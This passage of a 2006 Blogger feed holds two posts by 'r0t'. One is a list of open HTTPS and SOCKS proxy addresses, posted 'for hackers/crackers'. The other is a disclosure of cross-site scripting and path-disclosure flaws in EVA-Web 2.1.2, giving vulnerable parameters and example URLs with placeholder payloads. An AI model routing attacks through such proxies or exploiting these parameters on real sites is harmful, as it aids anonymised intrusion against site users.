/&gt;Socks:  63.98.143.110:5228  &lt;br /&gt;UNITED STATES, ST. SIMONS ISLAND, GEORGIA&lt;br /&gt;&lt;br /&gt;HTTPs:  62.241.65.63:49491   &lt;br /&gt;Socks:  62.241.65.63:63991  &lt;br /&gt;SPAIN, GIJON, ASTURIAS&lt;br /&gt;&lt;br /&gt;HTTPs:  82.216.127.121:64932  &lt;br /&gt;Socks:  82.216.127.121:40544  &lt;br /&gt;FRANCE, -, -&lt;br /&gt;&lt;br /&gt;HTTPs:  85.237.175.54:56049   &lt;br /&gt;Socks:  85.237.175.54:43902  &lt;br /&gt;POLAND, -, -&lt;br /&gt;&lt;br /&gt;HTTPs:  218.18.33.2:50839   &lt;br /&gt;Socks:  218.18.33.2:63245  &lt;br /&gt;CHINA, SHENZHEN, GUANGDONG&lt;br /&gt;&lt;br /&gt;HTTPs:  84.90.3.174:7816   &lt;br /&gt;Socks:  84.90.3.174:25656  &lt;br /&gt;PORTUGAL, -, -&lt;br /&gt;&lt;br /&gt;HTTPs:  213.89.95.208:55133   &lt;br /&gt;Socks:  213.89.95.208:47460  &lt;br /&gt;SWEDEN, STOCKHOLM, STOCKHOLM&lt;br /&gt;&lt;br /&gt;HTTPs:  65.94.149.151:12518   &lt;br /&gt;Socks:  65.94.149.151:37552  &lt;br /&gt;CANADA, MONTREAL, QUEBEC&lt;br /&gt;&lt;br /&gt;HTTPs:  12.226.114.115:20798   &lt;br /&gt;Socks:  12.226.114.115:49122  &lt;br /&gt;UNITED STATES, MILLSBORO, DELAWARE&lt;br /&gt;&lt;br /&gt;HTTPs:  88.247.80.192:53302   &lt;br /&gt;Socks:  88.247.80.192:8622  &lt;br /&gt;TURKEY, -, -&lt;br /&gt;&lt;br /&gt;HTTPs:  65.35.87.176:46582   &lt;br /&gt;Socks:  65.35.87.176:47038  &lt;br /&gt;UNITED STATES, MELBOURNE, FLORIDA&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114875753638085809?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114875753638085809/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114875753638085809' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114875753638085809'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114875753638085809'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/05/proxysocks-4-hackerscrackers.html' title='proxy&amp;socks 4 hackers/crackers'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-114868104378279924</id><published>2006-05-27T00:03:00.000+02:00</published><updated>2007-02-08T19:18:17.326+01:00</updated><title type='text'>EVA-Web &lt;=2.1.2 vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 may 2006&lt;br /&gt;vendor:http://spip-edu.edres74.net/&lt;br /&gt;affected versions:2.1.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;EVA-Web contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "debut_image" parameter in "article-album.php3" and "date" parameter in "rubrique.php3" and "perso","aide" parameters isn't properly sanitised before being returned to the user.&lt;br /&gt;This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.&lt;br /&gt;&lt;br /&gt;examples:&lt;br /&gt;&lt;br /&gt;/article-album.php3?id_article=39&amp;debut_image=[XSS]&lt;br /&gt;/rubrique.php3?id_rubrique=29&amp;date=[XSS]&lt;br /&gt;/?perso=[XSS]&lt;br /&gt;/?aide=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;+  &lt;br /&gt;/?perso=full path&lt;br /&gt;/?aide=full path&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-114868104378279924?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/114868104378279924/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=114868104378279924' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114868104378279924'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/114868104378279924'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/05/eva-web-212-vuln.html' title='EVA-Web &lt;=2.1.2 vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
